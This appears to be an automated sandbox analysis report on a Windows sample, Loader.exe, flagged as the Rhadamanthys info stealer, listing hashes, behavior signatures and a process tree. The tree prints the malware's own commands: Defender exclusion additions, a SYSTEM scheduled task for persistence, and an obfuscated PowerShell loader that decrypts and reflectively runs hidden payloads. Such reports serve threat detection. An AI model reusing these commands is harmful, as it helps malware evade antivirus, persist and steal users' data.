Analysis
-
max time kernel
146s -
max time network
155s -
platform
windows10-2004_x64 -
resource
win10v2004-20240226-en -
resource tags
arch:x64arch:x86image:win10v2004-20240226-enlocale:en-usos:windows10-2004-x64system -
submitted
04-04-2024 12:27
Static task
static1
Behavioral task
behavioral1
Sample
Loader.exe
Resource
win7-20240221-en
Behavioral task
behavioral2
Sample
Loader.exe
Resource
win10v2004-20240226-en
Behavioral task
behavioral3
Sample
opengl32.dll
Resource
win7-20240221-en
Behavioral task
behavioral4
Sample
opengl32.dll
Resource
win10v2004-20240226-en
General
-
Target
Loader.exe
-
Size
69.9MB
-
MD5
0e3f59387c131274d399813d1d95d80c
-
SHA1
f09cce4678a762cfe87dbc5c8b68f9a951afebb2
-
SHA256
558be4bca2165d9e1335330cfacc0ff3c175ed21dfe17c7421b3b1bae6348a6a
-
SHA512
fc04a75b47d0780212971e7a1db91df5f4d98ed796379bea053fb2c2578b3de42a6da561ce1579479f6f5088a06ff32d6945ac5fe112a5ca236f5453c60e54e1
-
SSDEEP
393216:S0tsUElbLI3r6B6Xlek/Kez3sFumIYUDfLFokwsWtjGHx:SEIHIjlek/KY4bIYU7/wsfx
Malware Config
Signatures
-
Rhadamanthys
Rhadamanthys is an info stealer written in C++ first seen in August 2022.
-
Suspicious use of NtCreateUserProcessOtherParentProcess 1 IoCs
Processes:
powershell.exedescription pid process target process PID 964 created 2896 964 powershell.exe svchost.exe -
Downloads MZ/PE file
-
Executes dropped EXE 1 IoCs
Processes:
driver1.exepid process 656 driver1.exe -
Program crash 2 IoCs
Processes:
WerFault.exeWerFault.exepid pid_target process target process 4060 964 WerFault.exe powershell.exe 3332 964 WerFault.exe powershell.exe -
Creates scheduled task(s) 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
-
Detects videocard installed 1 TTPs 1 IoCs
Uses WMIC.exe to determine videocard installed.
-
GoLang User-Agent 3 IoCs
Uses default user-agent string defined by GoLang HTTP packages.
Processes:
description flow ioc HTTP User-Agent header 15 Go-http-client/1.1 HTTP User-Agent header 16 Go-http-client/1.1 HTTP User-Agent header 17 Go-http-client/1.1 -
Suspicious behavior: EnumeratesProcesses 14 IoCs
Processes:
powershell.exepowershell.exepowershell.exepowershell.exedialer.exepid process 3656 powershell.exe 3656 powershell.exe 716 powershell.exe 716 powershell.exe 964 powershell.exe 964 powershell.exe 1508 powershell.exe 1508 powershell.exe 964 powershell.exe 964 powershell.exe 3892 dialer.exe 3892 dialer.exe 3892 dialer.exe 3892 dialer.exe -
Suspicious use of AdjustPrivilegeToken 46 IoCs
Processes:
WMIC.exepowershell.exepowershell.exepowershell.exepowershell.exedescription pid process Token: SeIncreaseQuotaPrivilege 3120 WMIC.exe Token: SeSecurityPrivilege 3120 WMIC.exe Token: SeTakeOwnershipPrivilege 3120 WMIC.exe Token: SeLoadDriverPrivilege 3120 WMIC.exe Token: SeSystemProfilePrivilege 3120 WMIC.exe Token: SeSystemtimePrivilege 3120 WMIC.exe Token: SeProfSingleProcessPrivilege 3120 WMIC.exe Token: SeIncBasePriorityPrivilege 3120 WMIC.exe Token: SeCreatePagefilePrivilege 3120 WMIC.exe Token: SeBackupPrivilege 3120 WMIC.exe Token: SeRestorePrivilege 3120 WMIC.exe Token: SeShutdownPrivilege 3120 WMIC.exe Token: SeDebugPrivilege 3120 WMIC.exe Token: SeSystemEnvironmentPrivilege 3120 WMIC.exe Token: SeRemoteShutdownPrivilege 3120 WMIC.exe Token: SeUndockPrivilege 3120 WMIC.exe Token: SeManageVolumePrivilege 3120 WMIC.exe Token: 33 3120 WMIC.exe Token: 34 3120 WMIC.exe Token: 35 3120 WMIC.exe Token: 36 3120 WMIC.exe Token: SeIncreaseQuotaPrivilege 3120 WMIC.exe Token: SeSecurityPrivilege 3120 WMIC.exe Token: SeTakeOwnershipPrivilege 3120 WMIC.exe Token: SeLoadDriverPrivilege 3120 WMIC.exe Token: SeSystemProfilePrivilege 3120 WMIC.exe Token: SeSystemtimePrivilege 3120 WMIC.exe Token: SeProfSingleProcessPrivilege 3120 WMIC.exe Token: SeIncBasePriorityPrivilege 3120 WMIC.exe Token: SeCreatePagefilePrivilege 3120 WMIC.exe Token: SeBackupPrivilege 3120 WMIC.exe Token: SeRestorePrivilege 3120 WMIC.exe Token: SeShutdownPrivilege 3120 WMIC.exe Token: SeDebugPrivilege 3120 WMIC.exe Token: SeSystemEnvironmentPrivilege 3120 WMIC.exe Token: SeRemoteShutdownPrivilege 3120 WMIC.exe Token: SeUndockPrivilege 3120 WMIC.exe Token: SeManageVolumePrivilege 3120 WMIC.exe Token: 33 3120 WMIC.exe Token: 34 3120 WMIC.exe Token: 35 3120 WMIC.exe Token: 36 3120 WMIC.exe Token: SeDebugPrivilege 3656 powershell.exe Token: SeDebugPrivilege 716 powershell.exe Token: SeDebugPrivilege 964 powershell.exe Token: SeDebugPrivilege 1508 powershell.exe -
Suspicious use of WriteProcessMemory 29 IoCs
Processes:
Loader.execmd.execmd.execmd.exepowershell.exedescription pid process target process PID 2972 wrote to memory of 3604 2972 Loader.exe cmd.exe PID 2972 wrote to memory of 3604 2972 Loader.exe cmd.exe PID 3604 wrote to memory of 3120 3604 cmd.exe WMIC.exe PID 3604 wrote to memory of 3120 3604 cmd.exe WMIC.exe PID 2972 wrote to memory of 3656 2972 Loader.exe powershell.exe PID 2972 wrote to memory of 3656 2972 Loader.exe powershell.exe PID 2972 wrote to memory of 716 2972 Loader.exe powershell.exe PID 2972 wrote to memory of 716 2972 Loader.exe powershell.exe PID 2972 wrote to memory of 656 2972 Loader.exe driver1.exe PID 2972 wrote to memory of 656 2972 Loader.exe driver1.exe PID 2972 wrote to memory of 3940 2972 Loader.exe cmd.exe PID 2972 wrote to memory of 3940 2972 Loader.exe cmd.exe PID 3940 wrote to memory of 4856 3940 cmd.exe cmd.exe PID 3940 wrote to memory of 4856 3940 cmd.exe cmd.exe PID 4856 wrote to memory of 1236 4856 cmd.exe cmd.exe PID 4856 wrote to memory of 1236 4856 cmd.exe cmd.exe PID 4856 wrote to memory of 964 4856 cmd.exe powershell.exe PID 4856 wrote to memory of 964 4856 cmd.exe powershell.exe PID 4856 wrote to memory of 964 4856 cmd.exe powershell.exe PID 2972 wrote to memory of 4348 2972 Loader.exe schtasks.exe PID 2972 wrote to memory of 4348 2972 Loader.exe schtasks.exe PID 964 wrote to memory of 1508 964 powershell.exe powershell.exe PID 964 wrote to memory of 1508 964 powershell.exe powershell.exe PID 964 wrote to memory of 1508 964 powershell.exe powershell.exe PID 964 wrote to memory of 3892 964 powershell.exe dialer.exe PID 964 wrote to memory of 3892 964 powershell.exe dialer.exe PID 964 wrote to memory of 3892 964 powershell.exe dialer.exe PID 964 wrote to memory of 3892 964 powershell.exe dialer.exe PID 964 wrote to memory of 3892 964 powershell.exe dialer.exe -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
Processes
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k UnistackSvcGroup -s CDPUserSvc1⤵PID:2896
-
C:\Windows\SysWOW64\dialer.exe"C:\Windows\system32\dialer.exe"2⤵
- Suspicious behavior: EnumeratesProcesses
PID:3892
-
-
C:\Users\Admin\AppData\Local\Temp\Loader.exe"C:\Users\Admin\AppData\Local\Temp\Loader.exe"1⤵
- Suspicious use of WriteProcessMemory
PID:2972 -
C:\Windows\system32\cmd.execmd /C "wmic path win32_VideoController get name"2⤵
- Suspicious use of WriteProcessMemory
PID:3604 -
C:\Windows\System32\Wbem\WMIC.exewmic path win32_VideoController get name3⤵
- Detects videocard installed
- Suspicious use of AdjustPrivilegeToken
PID:3120
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -WindowStyle hidden -Command "Add-MpPreference -ExclusionPath \"C:\Users\Admin\AppData\Roaming\""2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3656
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -WindowStyle hidden -Command "Add-MpPreference -ExclusionPath \"C:\ProgramData\""2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:716
-
-
C:\ProgramData\driver1.exeC:\ProgramData\driver1.exe2⤵
- Executes dropped EXE
PID:656
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\ProgramData\driver2.cmd2⤵
- Suspicious use of WriteProcessMemory
PID:3940 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /K C:\ProgramData\driver2.cmd3⤵
- Suspicious use of WriteProcessMemory
PID:4856 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo $host.UI.RawUI.WindowTitle='C:\ProgramData\driver2.cmd';$AqEi='CrsqtpesqtpatsqtpeDesqtpcrsqtpyptsqtposqtprsqtp'.Replace('sqtp', ''),'FrCJbRoCJbRmBaCJbRseCJbR64CJbRStCJbRriCJbRnCJbRgCJbR'.Replace('CJbR', ''),'InTTXMvokTTXMeTTXM'.Replace('TTXM', ''),'EnfaNStryfaNSPoifaNSnfaNStfaNS'.Replace('faNS', ''),'ChMkDfanMkDfgeMkDfExtMkDfensMkDfioMkDfnMkDf'.Replace('MkDf', ''),'LonQgGanQgGdnQgG'.Replace('nQgG', ''),'MbgpxaibgpxnMbgpxobgpxdulbgpxebgpx'.Replace('bgpx', ''),'REtcKeEtcKadLEtcKinEtcKesEtcK'.Replace('EtcK', ''),'ElzFDsemzFDsezFDsnzFDstAzFDstzFDs'.Replace('zFDs', ''),'CenWEopenWEyenWEToenWE'.Replace('enWE', ''),'GeEAEWtCuEAEWrrEAEWenEAEWtPEAEWroEAEWcEAEWeEAEWsEAEWsEAEW'.Replace('EAEW', ''),'SpOMiiliOMiitOMii'.Replace('OMii', ''),'TrNYnSanNYnSsNYnSfNYnSorNYnSmNYnSFNYnSinaNYnSlBlNYnSocNYnSkNYnS'.Replace('NYnS', ''),'DecKPNcocKPNmpcKPNrcKPNesscKPN'.Replace('cKPN', '');powershell -w hidden;function CpemN($DYVvD){$uCDxz=[System.Security.Cryptography.Aes]::Create();$uCDxz.Mode=[System.Security.Cryptography.CipherMode]::CBC;$uCDxz.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7;$uCDxz.Key=[System.Convert]::($AqEi[1])('hwWmx8yZnmhBXTUujLmUilT/inW7ASWUfza/yiGaTE0=');$uCDxz.IV=[System.Convert]::($AqEi[1])('1shh+Csacdi2MAxWoHL6Vw==');$WrKXJ=$uCDxz.($AqEi[0])();$lQEbS=$WrKXJ.($AqEi[12])($DYVvD,0,$DYVvD.Length);$WrKXJ.Dispose();$uCDxz.Dispose();$lQEbS;}function Vaeom($DYVvD){$ufaBC=New-Object System.IO.MemoryStream(,$DYVvD);$fvcwX=New-Object System.IO.MemoryStream;$KxhFO=New-Object System.IO.Compression.GZipStream($ufaBC,[IO.Compression.CompressionMode]::($AqEi[13]));$KxhFO.($AqEi[9])($fvcwX);$KxhFO.Dispose();$ufaBC.Dispose();$fvcwX.Dispose();$fvcwX.ToArray();}$oYEdq=[System.IO.File]::($AqEi[7])([Console]::Title);$sExPv=Vaeom (CpemN ([Convert]::($AqEi[1])([System.Linq.Enumerable]::($AqEi[8])($oYEdq, 5).Substring(2))));$uYvCe=Vaeom (CpemN ([Convert]::($AqEi[1])([System.Linq.Enumerable]::($AqEi[8])($oYEdq, 6).Substring(2))));[System.Reflection.Assembly]::($AqEi[5])([byte[]]$uYvCe).($AqEi[3]).($AqEi[2])($null,$null);[System.Reflection.Assembly]::($AqEi[5])([byte[]]$sExPv).($AqEi[3]).($AqEi[2])($null,$null); "4⤵PID:1236
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeC:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe4⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:964 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden5⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1508
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 964 -s 24325⤵
- Program crash
PID:4060
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 964 -s 23765⤵
- Program crash
PID:3332
-
-
-
-
-
C:\Windows\system32\schtasks.exeschtasks /create /tn WinDriver /tr C:\ProgramData\Microsoft\WinDriver.cmd /sc onstart /ru SYSTEM2⤵
- Creates scheduled task(s)
PID:4348
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 408 -p 964 -ip 9641⤵PID:2640
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 504 -p 964 -ip 9641⤵PID:3620
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
3.6MB
MD5eb93f3965887e8796917d34d40c0869d
SHA110976e4bc2a7d412550048c06def0b0ebba77eb6
SHA25631d452a1ae5637cd3127e7a2e4e8de9771ea1d4e2fa34cddfdd9f90b73d098a5
SHA512b743c9ef3fe72f7e79c16929ee6d00cd4a0961309ea73f12b599bf5217b271bef61ac1981fed8a2b48187c5ad8ca18d572d7076d335f0440c52f77f47cd81281
-
Filesize
7.2MB
MD5d14ef6e6b689c92514b92b7865f622c6
SHA103a0aaafd831d9c07784744e0358b83e506402ab
SHA2562d68dffce5555c659fb1de2b4d1e28597667ddefd6c99844ee5a346adcf0d036
SHA51287754c793b4abc0066588cf60cff7b763090e2680aa3bc889e9f36ecaee28f18ea0ab1bb37d7049781079197237d83bb0995b61caa87888df4556ae921973d0c
-
Filesize
2KB
MD5d85ba6ff808d9e5444a4b369f5bc2730
SHA131aa9d96590fff6981b315e0b391b575e4c0804a
SHA25684739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f
SHA5128c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249
-
Filesize
944B
MD5d28a889fd956d5cb3accfbaf1143eb6f
SHA1157ba54b365341f8ff06707d996b3635da8446f7
SHA25621e5d7ccf80a293e6ba30ed728846ca19c929c52b96e2c8d34e27cd2234f1d45
SHA5120b6d88deb9be85722e6a78d5886d49f2caf407a59e128d2b4ed74c1356f9928c40048a62731959f2460e9ff9d9feee311043d2a37abe3bb92c2b76a44281478c
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82